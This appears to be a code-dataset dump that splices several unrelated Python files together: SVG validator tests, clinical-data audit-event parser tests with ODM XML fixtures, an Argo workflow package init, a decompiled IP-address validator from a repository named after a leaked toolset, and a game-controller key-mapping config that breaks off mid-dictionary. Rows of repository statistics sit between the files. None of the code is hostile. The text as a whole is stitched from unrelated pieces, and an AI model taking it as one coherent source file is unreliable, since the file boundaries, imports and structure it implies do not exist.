        self.assertTrue(self.checker.is_paint("none"))
        self.assertTrue(self.checker.is_paint("currentColor"))
        self.assertTrue(self.checker.is_paint("rgb(10,20,30)"))
        self.assertTrue(self.checker.is_paint("rgb(10%,20%,30%)"))
        self.assertTrue(self.checker.is_paint("url(localhost)"))
        self.assertTrue(self.checker.is_paint("red"))

    def test_is_not_paint(self):
        self.assertFalse(self.checker.is_paint("(123)"))
        self.assertFalse(self.checker.is_paint("123"))
        self.assertFalse(self.checker.is_paint("schwarz"))

    def test_is_XML_name(self):
        self.assertTrue(self.checker.is_XML_Name("Name:xml123"))
        self.assertTrue(self.checker.is_XML_Name("Name-xml123"))
        self.assertTrue(self.checker.is_XML_Name("Name.xml123"))

    def test_is_not_XML_name(self):
        self.assertFalse(self.checker.is_XML_Name("Name xml123"))
        self.assertFalse(self.checker.is_XML_Name("0Name:xml123"))
        self.assertFalse(self.checker.is_XML_Name(".Name:xml123"))

    def test_is_transform_list(self):
        self.assertTrue(self.checker.is_transform_list("translate(10,10)"))
        self.assertTrue(self.checker.is_transform_list("scale(2 2)"))
        self.assertTrue(self.checker.is_transform_list("rotate( 30 )"))
        self.assertTrue(self.checker.is_transform_list("skewX(15)"))
        self.assertTrue(self.checker.is_transform_list("skewY(-15)"))
        self.assertTrue(self.checker.is_transform_list("matrix(.1 .2 .3 .4 .5 .6)"))
        self.assertTrue(self.checker.is_transform_list("translate(10,10), rotate( 30 )"))
        self.assertTrue(self.checker.is_transform_list("translate(10,10) , rotate( 30 )"))
        self.assertTrue(self.checker.is_transform_list("translate(10,10) , rotate( 30 )"))
        self.assertTrue(self.checker.is_transform_list("translate(10,10) rotate( 30 )"))

    def test_is_not_transform_list(self):
        self.assertFalse(self.checker.is_transform_list("mozman(10,10)"))
        self.assertFalse(self.checker.is_transform_list("translate(10,10"))
        self.assertFalse(self.checker.is_transform_list("translate 10, 10"))
        self.assertFalse(self.checker.is_transform_list("translate(10, 10))"))
        self.assertFalse(self.checker.is_transform_list("translate((10, 10))"))

    def test_is_not_transform_list_invalid_separator(self):
        self.assertFalse(self.checker.is_transform_list("translate(10,10) ,, rotate( 30 )"))
        self.assertFalse(self.checker.is_transform_list("translate(10,10) x rotate( 30 )"))

    def test_is_four_numbers(self):
        self.assertTrue(self.checker.is_four_numbers(' 1, 2, 3, 4 '))
        self.assertTrue(self.checker.is_four_numbers(' 1 2 3 4 '))
        self.assertTrue(self.checker.is_four_numbers((1,2,3,4)))

    def test_is_not_four_numbers(self):
        self.assertFalse(self.checker.is_four_numbers(' 1, 2, 3, '))
        self.assertFalse(self.checker.is_four_numbers(' 1, 2 '))
        self.assertFalse(self.checker.is_four_numbers(' 1 '))
        self.assertFalse(self.checker.is_four_numbers((1,2,3)))

    def test_is_shape_units_and_auto(self):
        self.assertTrue(self.checker.is_shape("rect(1,2,3,4)"))
        self.assertTrue(self.checker.is_shape("rect(1px,2px,-3px,-4px)"))
        self.assertTrue(self.checker.is_shape("rect( 1px , 2px , -3px , -4px )"))
        self.assertTrue(self.checker.is_shape("rect(auto,auto,auto,auto)"))
        self.assertTrue(self.checker.is_shape("rect( auto , auto , auto , auto )"))

if __name__ == '__main__':
    unittest.main()
| 52.254286 | 93 | 0.658483 | 2,466 | 18,289 | 4.695053 | 0.083536 | 0.216618 | 0.253757 | 0.278546 | 0.880463 | 0.85887 | 0.713422 | 0.634134 | 0.542149 | 0.516151 | 0 | 0.053881 | 0.187162 | 18,289 | 349 | 94 | 52.404011 | 0.724943 | 0.031166 | 0 | 0.085324 | 0 | 0 | 0.122151 | 0.005366 | 0 | 0 | 0 | 0 | 0.774744 | 1 | 0.180887 | false | 0 | 0.010239 | 0 | 0.194539 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
17b83359fd181c0a8ff76d740f2b336af9e5f13b | 9,373 | py | Python | rwslib/tests/test_audit_event.py | mdsol/rwslib | 799cbc2ca75dc1be3cb4099bf26b7a5cc360fbfd | [
"MIT"
] | 20 | 2015-05-21T17:07:20.000Z | 2021-12-09T02:46:16.000Z | rwslib/tests/test_audit_event.py | mdsol/rwslib | 799cbc2ca75dc1be3cb4099bf26b7a5cc360fbfd | [
"MIT"
] | 83 | 2015-01-09T08:48:21.000Z | 2022-03-28T11:09:34.000Z | rwslib/tests/test_audit_event.py | mdsol/rwslib | 799cbc2ca75dc1be3cb4099bf26b7a5cc360fbfd | [
"MIT"
] | 20 | 2015-05-21T17:07:29.000Z | 2021-05-12T11:59:58.000Z | from rwslib.extras.audit_event import parser
import unittest
import os
class MockEventer:
    """
    Mock Event Sink instance for the purposes of testing (capturing all ASC)
    """

    def __init__(self):
        self.__events = {}

    def default(self, event):
        self.__events.setdefault(event.subcategory, []).append(event)

    def get_audit_subcategory_events(self, audit_subcategory):
        return self.__events[audit_subcategory]

    @property
    def eventlist(self):
        return self.__events.keys()


class MockEventerEntered:
    """
    Mock Event Sink instance for the purposes of testing (capturing only 'Entered' ASC)
    """

    def __init__(self):
        self.__events = {}

    def get_audit_subcategory_events(self, audit_subcategory):
        return self.__events.get(audit_subcategory, [])

    def Entered(self, event):
        self.__events.setdefault(event.subcategory, []).append(event)

    @property
    def eventlist(self):
        return self.__events.keys()


class TestAuditEvent(unittest.TestCase):
    """
    Test Case for Audit Event Processor
    """

    def test_parses_audit_message(self):
        """parses an audit message from a CAR message"""
        with open(
            os.path.join(os.path.dirname(__file__), "fixtures", "car_message.xml")
        ) as fh:
            content = fh.read()
        eventer = MockEventer()
        message = parser.parse(content, eventer)
        # get the events
        self.assertTrue(len(eventer.eventlist) > 1)
        self.assertTrue("EnteredEmpty" in eventer.eventlist)
        self.assertEqual(60, len(eventer.get_audit_subcategory_events("EnteredEmpty")))
        self.assertEqual(501, len(eventer.get_audit_subcategory_events("Entered")))

    def test_parses_audit_message_entered(self):
        """parses an audit message, subscribing only to Entered events from a CAR message"""
        with open(
            os.path.join(os.path.dirname(__file__), "fixtures", "car_message.xml")
        ) as fh:
            content = fh.read()
        eventer = MockEventerEntered()
        message = parser.parse(content, eventer)
        # get the events
        self.assertTrue(len(eventer.eventlist) == 1)
        self.assertTrue("EnteredEmpty" not in eventer.eventlist)
        self.assertEqual(0, len(eventer.get_audit_subcategory_events("EnteredEmpty")))
        self.assertEqual(501, len(eventer.get_audit_subcategory_events("Entered")))

    def test_parses_audit_message_subject_created(self):
        """parses an audit message and verifies the SubjectCreated events from a CAR message"""
        with open(
            os.path.join(os.path.dirname(__file__), "fixtures", "car_message.xml")
        ) as fh:
            content = fh.read()
        eventer = MockEventer()
        message = parser.parse(content, eventer)
        # get the events
        self.assertEqual(
            92, len(eventer.get_audit_subcategory_events("SubjectCreated"))
        )
        subject_123_ABC = eventer.get_audit_subcategory_events("SubjectCreated")[0]
        self.assertEqual(
            "e983f330-c108-45ab-8f16-b4a566c7089c", subject_123_ABC.subject.key
        )
        self.assertEqual("123 ABC", subject_123_ABC.subject.name)

    def test_parses_specify_value(self):
        """Extracts a specified value from a CAR message"""
        content = """<ODM ODMVersion="1.3" FileType="Transactional" FileOID="552a8cac-7c4e-4ba5-9f71-a20b90865531" CreationDateTime="2021-06-02T10:21:02" xmlns="http://www.cdisc.org/ns/odm/v1.3" xmlns:mdsol="http://www.mdsol.com/ns/odm/metadata">
          <ClinicalData StudyOID="Mediflex" MetaDataVersionOID="16" mdsol:AuditSubCategoryName="Entered">
            <SubjectData SubjectKey="e983f330-c108-45ab-8f16-b4a566c7089c" mdsol:SubjectKeyType="SubjectUUID" mdsol:SubjectName="123 ABC" >
              <SiteRef LocationOID="MDSOL" />
              <StudyEventData StudyEventOID="SCREEN" StudyEventRepeatKey="SCREEN[1]" mdsol:InstanceId="50" >
                <FormData FormOID="DM" FormRepeatKey="1" mdsol:DataPageId="179" >
                  <ItemGroupData ItemGroupOID="DM" mdsol:RecordId="251" >
                    <ItemData ItemOID="DM.SEX" TransactionType="Upsert" Value="Specify" mdsol:SpecifyValue="UNDEF" >
                      <AuditRecord>
                        <UserRef UserOID="pvummudi"/>
                        <LocationRef LocationOID="MDSOL" />
                        <DateTimeStamp>2008-12-04T16:59:07</DateTimeStamp>
                        <ReasonForChange></ReasonForChange>
                        <SourceID>3284</SourceID>
                      </AuditRecord>
                    </ItemData>
                  </ItemGroupData>
                </FormData>
              </StudyEventData>
            </SubjectData>
          </ClinicalData>
        </ODM>
        """
        eventer = MockEventer()
        message = parser.parse(content, eventer)
        event = eventer.get_audit_subcategory_events("Entered")[0]
        self.assertEqual("UNDEF", event.item.specify_value)
        self.assertEqual("Specify", event.item.value)
        self.assertEqual("DM.SEX", event.item.oid)

    def test_parses_signature_broken(self):
        """parses mdsol:SignatureBroken from a CAR message for the case when the signature is broken"""
        content = """<ODM ODMVersion="1.3" FileType="Transactional" FileOID="552a8cac-7c4e-4ba5-9f71-a20b90865531" CreationDateTime="2021-06-02T10:21:02" xmlns="http://www.cdisc.org/ns/odm/v1.3" xmlns:mdsol="http://www.mdsol.com/ns/odm/metadata">
          <ClinicalData StudyOID="Mediflex" MetaDataVersionOID="16" mdsol:AuditSubCategoryName="Entered">
            <SubjectData SubjectKey="e983f330-c108-45ab-8f16-b4a566c7089c" mdsol:SubjectKeyType="SubjectUUID" mdsol:SubjectName="123 ABC" >
              <SiteRef LocationOID="MDSOL" />
              <StudyEventData StudyEventOID="SCREEN" StudyEventRepeatKey="SCREEN[1]" mdsol:InstanceId="50" >
                <FormData FormOID="DM" FormRepeatKey="1" mdsol:DataPageId="179" >
                  <ItemGroupData ItemGroupOID="DM" mdsol:RecordId="251" >
                    <ItemData ItemOID="DM.SEX" TransactionType="Upsert" Value="Specify" mdsol:SpecifyValue="UNDEF" mdsol:SignatureBroken="Yes" >
                      <AuditRecord>
                        <UserRef UserOID="pvummudi"/>
                        <LocationRef LocationOID="MDSOL" />
                        <DateTimeStamp>2008-12-04T16:59:07</DateTimeStamp>
                        <ReasonForChange></ReasonForChange>
                        <SourceID>3284</SourceID>
                      </AuditRecord>
                    </ItemData>
                  </ItemGroupData>
                </FormData>
              </StudyEventData>
            </SubjectData>
          </ClinicalData>
        </ODM>
        """
        eventer = MockEventer()
        message = parser.parse(content, eventer)
        event = eventer.get_audit_subcategory_events("Entered")[0]
        self.assertEqual("UNDEF", event.item.specify_value)
        self.assertEqual("Specify", event.item.value)
        self.assertEqual("DM.SEX", event.item.oid)
        self.assertTrue(event.item.signature_broken)

    def test_parses_signature_not_broken(self):
        """parses mdsol:SignatureBroken from a CAR message for the case when the signature is not broken"""
        content = """<ODM ODMVersion="1.3" FileType="Transactional" FileOID="552a8cac-7c4e-4ba5-9f71-a20b90865531" CreationDateTime="2021-06-02T10:21:02" xmlns="http://www.cdisc.org/ns/odm/v1.3" xmlns:mdsol="http://www.mdsol.com/ns/odm/metadata">
          <ClinicalData StudyOID="Mediflex" MetaDataVersionOID="16" mdsol:AuditSubCategoryName="Entered">
            <SubjectData SubjectKey="e983f330-c108-45ab-8f16-b4a566c7089c" mdsol:SubjectKeyType="SubjectUUID" mdsol:SubjectName="123 ABC" >
              <SiteRef LocationOID="MDSOL" />
              <StudyEventData StudyEventOID="SCREEN" StudyEventRepeatKey="SCREEN[1]" mdsol:InstanceId="50" >
                <FormData FormOID="DM" FormRepeatKey="1" mdsol:DataPageId="179" >
                  <ItemGroupData ItemGroupOID="DM" mdsol:RecordId="251" >
                    <ItemData ItemOID="DM.SEX" TransactionType="Upsert" Value="Specify" mdsol:SpecifyValue="UNDEF" mdsol:SignatureBroken="No" >
                      <AuditRecord>
                        <UserRef UserOID="pvummudi"/>
                        <LocationRef LocationOID="MDSOL" />
                        <DateTimeStamp>2008-12-04T16:59:07</DateTimeStamp>
                        <ReasonForChange></ReasonForChange>
                        <SourceID>3284</SourceID>
                      </AuditRecord>
                    </ItemData>
                  </ItemGroupData>
                </FormData>
              </StudyEventData>
            </SubjectData>
          </ClinicalData>
        </ODM>
        """
        eventer = MockEventer()
        message = parser.parse(content, eventer)
        event = eventer.get_audit_subcategory_events("Entered")[0]
        self.assertEqual("UNDEF", event.item.specify_value)
        self.assertEqual("Specify", event.item.value)
        self.assertEqual("DM.SEX", event.item.oid)
        self.assertFalse(event.item.signature_broken)
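
class CountingEventer:
    """
    Minimal example sink (hypothetical, mirroring the mocks above): the parser
    dispatches each event to a method named after its audit subcategory and
    falls back to default(), so this simply counts every subcategory it sees.
    """

    def __init__(self):
        self.counts = {}

    def default(self, event):
        self.counts[event.subcategory] = self.counts.get(event.subcategory, 0) + 1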
| 48.817708 | 246 | 0.611971 | 914 | 9,373 | 6.155361 | 0.196937 | 0.042659 | 0.040526 | 0.04888 | 0.901884 | 0.8754 | 0.858514 | 0.849449 | 0.832385 | 0.795059 | 0 | 0.048691 | 0.270351 | 9,373 | 191 | 247 | 49.073298 | 0.773944 | 0.067534 | 0 | 0.764706 | 0 | 0.058824 | 0.56841 | 0.193511 | 0 | 0 | 0 | 0 | 0.143791 | 1 | 0.091503 | false | 0 | 0.019608 | 0.026144 | 0.156863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
17e29c6bdfcac864581921c09b45cd98d3d6d96e | 200 | py | Python | argo_workflow_tools/dsl/node_properties/__init__.py | shanioren/argo-workflow-tools | d2fb41de3f5ccf9284ff4cb027a886ff61a13e69 | [
"Apache-2.0"
] | 15 | 2021-12-08T20:57:52.000Z | 2022-03-23T19:41:29.000Z | argo_workflow_tools/dsl/node_properties/__init__.py | shanioren/argo-workflow-tools | d2fb41de3f5ccf9284ff4cb027a886ff61a13e69 | [
"Apache-2.0"
] | 18 | 2021-12-07T07:49:17.000Z | 2022-03-02T10:27:49.000Z | argo_workflow_tools/dsl/node_properties/__init__.py | shanioren/argo-workflow-tools | d2fb41de3f5ccf9284ff4cb027a886ff61a13e69 | [
"Apache-2.0"
] | 3 | 2022-01-09T08:19:11.000Z | 2022-02-09T15:20:08.000Z | from argo_workflow_tools.dsl.node_properties.dag_node_properties import (
    DAGNodeProperties,
)
from argo_workflow_tools.dsl.node_properties.task_node_properties import (
    TaskNodeProperties,
)
| 28.571429 | 74 | 0.84 | 24 | 200 | 6.583333 | 0.5 | 0.35443 | 0.202532 | 0.265823 | 0.481013 | 0.481013 | 0.481013 | 0 | 0 | 0 | 0 | 0 | 0.1 | 200 | 6 | 75 | 33.333333 | 0.877778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
aa367c1af889cf78d6b90ef4decf5486695b4aed | 2,423 | py | Python | Leak #5 - Lost In Translation/windows/Resources/Pc/PyScripts/Lib/pc/__init__.py | bidhata/EquationGroupLeaks | 1ff4bc115cb2bd5bf2ed6bf769af44392926830c | [
"Unlicense"
] | 9 | 2019-11-22T04:58:40.000Z | 2022-02-26T16:47:28.000Z | Leak #5 - Lost In Translation/windows/Resources/Pc/PyScripts/Lib/pc/__init__.py | bidhata/EquationGroupLeaks | 1ff4bc115cb2bd5bf2ed6bf769af44392926830c | [
"Unlicense"
] | null | null | null | Leak #5 - Lost In Translation/windows/Resources/Pc/PyScripts/Lib/pc/__init__.py | bidhata/EquationGroupLeaks | 1ff4bc115cb2bd5bf2ed6bf769af44392926830c | [
"Unlicense"
] | 8 | 2017-09-27T10:31:18.000Z | 2022-01-08T10:30:46.000Z | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
# Compiled at: 2012-04-27 21:25:42
def IsValidIpAddress(addr):
    import re
    import dsz  # assumption: the dsz framework module is importable here; the decompiled source uses it without an explicit import
    # The decompiled original chained all of these re.match() calls into one
    # 2000-character `or` expression; the list below preserves the patterns
    # and the matching behaviour verbatim.
    ip_patterns = [
        '^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$',
        '^([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$',
        '^::$',
        '^::([a-fA-F0-9]){1,4}(:([a-f]|[A-F]|[0-9]){1,4}){0,6}$',
        '^([a-fA-F0-9]){1,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,5}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::([a-fA-F0-9]){1,4}:([a-fA-F0-9]){1,4}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,5}::([a-fA-F0-9]){1,4}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,6}::$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){5}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$',
        '^::([0-9]){1,3}(\\.[0-9]{1,3}){3}$',
        '^::([a-fA-F0-9]){1,4}(:)([0-9]){1,3}(\\.[0-9]{1,3}){3}$',
        '^([a-fA-F0-9]){1,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}::([a-fA-F0-9]){1,4}(:[a-fA-F0-9]){0,2}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}::([a-fA-F0-9]){1,4}(:[a-fA-F0-9]){0,1}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}::([a-fA-F0-9]){1,4}:[0-9]{1,3}(\\.[0-9]{1,3}){3}$',
        '^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::[0-9]{1,3}(\\.[0-9]{1,3}){3}$']
    for pattern in ip_patterns:
        if re.match(pattern, addr) is not None:
            return True
    dsz.ui.Echo('Invalid IP address', dsz.ERROR)
    return False | 151.4375 | 2,042 | 0.463062 | 594 | 2,423 | 1.882155 | 0.106061 | 0.119857 | 0.214669 | 0.257603 | 0.772809 | 0.772809 | 0.761181 | 0.728086 | 0.728086 | 0.728086 | 0 | 0.171749 | 0.079653 | 2,423 | 16 | 2,043 | 151.4375 | 0.329596 | 0.084606 | 0 | 0 | 0 | 2.25 | 0.658228 | 0.648282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14
aa433ef95de88ffaf01b5dea39ba1be8c43267cd | 8,338 | py | Python | McAirpos/uinput-mapper/configs/examples/arcade2_old.py | SuperPupperDoggo/McAirpos | e80c9504796da494e9d3ff79f0b26999afb5619e | [
"MIT"
] | null | null | null | McAirpos/uinput-mapper/configs/examples/arcade2_old.py | SuperPupperDoggo/McAirpos | e80c9504796da494e9d3ff79f0b26999afb5619e | [
"MIT"
] | null | null | null | McAirpos/uinput-mapper/configs/examples/arcade2_old.py | SuperPupperDoggo/McAirpos | e80c9504796da494e9d3ff79f0b26999afb5619e | [
"MIT"
] | null | null | null | from uinputmapper.cinput import *
"""
Configuration that maps EV_ABS (axis) and EV_KEY (digital button) events from
many kinds of directional controllers onto a single EV_KEY MakeCode Arcade
keyboard device.
"""
# Global variables
autoconf = 1  # When 1, min and max for EV_ABS events are determined automatically; when 0 they must be set manually below
deadzone = 0.25  # Fraction of the half-range an axis must travel before EV_ABS events react; damps jittery axis movements
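# Illustrative numbers: with min=0 and max=255 (so mid=127.5) and the 0.25
# deadzone above, a direction only registers once the axis passes
# 127.5 +/- (255 - 127.5) * 0.25, i.e. below ~95.6 or above ~159.4.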
# Variables for EV_ABS controller no. 1
invertUp = 0  # Set to 1 to invert the Y axis (needed by e.g. the SteelSeries Nimbus controller)
invertLeft = 0  # Set to 1 to invert the X axis
max = 1  # Seed value for autoconf (shadows the builtin max); for manual setup, find the device's range with ./input-read -v -p /dev/input/eventX
min = 0  # Seed value for autoconf (shadows the builtin min)
mid = (min + max)/2
# Directional functions for EV_ABS controller no. 1
def digitizeUp(x):
global min, mid, max, deadzone
if x < min:
min = x
mid = (min + max)/2
if invertUp:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeDown(x):
global min, mid, max, deadzone
if x > max:
max = x
mid = (min + max)/2
if invertUp:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeLeft(x):
global min, mid, max, deadzone
if x < min:
min = x
mid = (min + max)/2
if invertLeft:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeRight(x):
global min, mid, max, deadzone
if x > max:
max = x
mid = (min + max)/2
if invertLeft:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
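# The four digitize* functions above (and the controller no. 2 variants
# below) differ only in which extreme they track and which inversion flag
# they consult. A generic sketch of the same logic (hypothetical helper,
# not referenced by the config below):
def _digitize(x, state, low_side, invert):
    # state is a dict carrying the running 'min' and 'max' for one axis.
    if low_side and x < state['min']:
        state['min'] = x
    elif not low_side and x > state['max']:
        state['max'] = x
    mid = (state['min'] + state['max']) / 2.0
    if invert:
        low_side = not low_side  # an inverted axis fires on the opposite side
    if low_side:
        return int(x < (mid - (state['max'] - mid) * deadzone))
    return int(x > (mid + (state['max'] - mid) * deadzone))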
# Variables for EV_ABS controller no. 2
invertUp2 = 0  # Set to 1 to invert the Y axis (needed by e.g. the SteelSeries Nimbus controller)
invertLeft2 = 0  # Set to 1 to invert the X axis
max2 = 1  # Seed value for autoconf; for manual setup, find the device's range with ./input-read -v -p /dev/input/eventX
min2 = 0  # Seed value for autoconf
mid2 = (min2 + max2)/2
# Directional functions for EV_ABS controller no. 2
def digitizeUp2(x):
global min2, mid2, max2, deadzone
if x < min2:
min2 = x
mid2 = (min2 + max2)/2
if invertUp2:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeDown2(x):
global min2, mid2, max2, deadzone
if x > max2:
max2 = x
mid2 = (min2 + max2)/2
if invertUp2:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeLeft2(x):
global min2, mid2, max2, deadzone
if x < min2:
min2 = x
mid2 = (min2 + max2)/2
if invertLeft2:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeRight2(x):
global min2, mid2, max2, deadzone
if x > max2:
max2 = x
mid2 = (min2 + max2)/2
if invertLeft2:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
# Variables for EV_ABS HAT controllers
hmin = -1
hmax = 1
hmid = 0
# Directional functions for EV_ABS HAT controllers
def hat0Pos(x):
global hmin, hmid, hmax
if x > hmid:
x = 1
else:
x = 0
return int(x)
def hat0Neg(x):
global hmin, hmid, hmax
if x < hmid:
x = 1
else:
x = 0
return int(x)
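# HAT axes report -1/0/+1, so this pair splits one axis into two keys:
# hat0Pos(1) -> 1 (the positive/right/down edge), hat0Neg(-1) -> 1 (the
# negative/left/up edge), and both return 0 at rest.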
# Button mapping config
config = {
# Controller no. 1
(0, EV_KEY): {
BTN_DPAD_UP: {
'type' : (0, EV_KEY),
'code' : 17,
'value' : None
},
BTN_DPAD_DOWN: {
'type' : (0, EV_KEY),
'code' : 31,
'value' : None
},
BTN_DPAD_LEFT: {
'type' : (0, EV_KEY),
'code' : 30,
'value' : None
},
BTN_DPAD_RIGHT: {
'type' : (0, EV_KEY),
'code' : 32,
'value' : None
},
BTN_SOUTH: {
'type' : (0, EV_KEY),
'code' : 29,
'value' : None
},
BTN_B: {
'type' : (0, EV_KEY),
'code' : 42,
'value' : None
},
BTN_START: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_SELECT: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
BTN_MODE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
},
},
(0, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 30,
'value' : digitizeLeft
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 17,
'value' : digitizeUp
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 32,
'value' : hat0Pos
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 31,
'value' : hat0Pos
}
},
(1, EV_KEY): {
BTN_THUMB: {
'type' : (0, EV_KEY),
'code' : 29,
'value' : None
},
BTN_THUMB2: {
'type' : (0, EV_KEY),
'code' : 42,
'value' : None
},
BTN_BASE4: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_BASE3: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
KEY_HOMEPAGE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
}
},
(1, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 32,
'value' : digitizeRight
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 31,
'value' : digitizeDown
},
ABS_Z: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : hat0Pos
},
ABS_RZ: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : hat0Pos
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 30,
'value' : hat0Neg
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 17,
'value' : hat0Neg
}
},
# Controller no. 2
(2, EV_KEY): {
BTN_DPAD_UP: {
'type' : (0, EV_KEY),
'code' : 103,
'value' : None
},
BTN_DPAD_DOWN: {
'type' : (0, EV_KEY),
'code' : 108,
'value' : None
},
BTN_DPAD_LEFT: {
'type' : (0, EV_KEY),
'code' : 105,
'value' : None
},
BTN_DPAD_RIGHT: {
'type' : (0, EV_KEY),
'code' : 106,
'value' : None
},
BTN_SOUTH: {
'type' : (0, EV_KEY),
'code' : 100,
'value' : None
},
BTN_B: {
'type' : (0, EV_KEY),
'code' : 57,
'value' : None
},
BTN_START: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_SELECT: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
BTN_MODE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
},
},
(2, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 105,
'value' : digitizeLeft2
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 103,
'value' : digitizeUp2
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 106,
'value' : hat0Pos
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 108,
'value' : hat0Pos
}
},
(3, EV_KEY): {
BTN_THUMB: {
'type' : (0, EV_KEY),
'code' : 100,
'value' : None
},
BTN_THUMB2: {
'type' : (0, EV_KEY),
'code' : 57,
'value' : None
},
BTN_BASE4: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_BASE3: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
KEY_HOMEPAGE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
}
},
(3, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 106,
'value' : digitizeRight2
},
